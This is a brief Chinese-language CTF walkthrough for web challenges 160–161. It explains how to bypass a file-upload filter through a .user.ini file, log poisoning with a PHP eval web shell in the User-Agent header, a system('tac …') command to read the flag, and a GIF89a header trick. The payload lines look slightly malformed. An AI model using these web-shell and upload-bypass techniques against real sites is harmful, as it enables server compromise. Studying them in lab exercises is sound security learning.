这道题跟前几题差不多增加了一个对 空格的限制
所以我们在写木马文件的时候只需要注意不要加上空格就好
这道题我们还是先上传user.ini文件
然后上传我们编写的木马文件,记得检查有没有空格
如果不确定自己的木马文件是否能上传成功就可以先发到repeater重放器里面如果resopnse中最后一行的结果类似与{"code":0,"msg":"upload/MM.png"}说明上传成功
此时我们就可以访问upload目录
然后在打开一个原来题目的网址,写入一个1.txt,并给它加上一个user-agent内容为:<?php eval($_POST1);?>
写好后点击execute运行,使其写入该网站的日志文件中
接下来回到upload目录下
开启POSTmethod进行命令执行
payload为:1=system('tac .../flag.php');
执行后在当前页面就可以看到flag了
161对文件的内容进行进一步限制,需要在前面限制条件的基础上再加上一个图片的头文件
我们要在user.ini文件和木马文件前加上一个GIF89a来绕过限制
因为GIF89a是一种图像文件格式的标准,所以可以在检验上传文件内容的时候绕过限制,使我们的攻击代码能够上传成功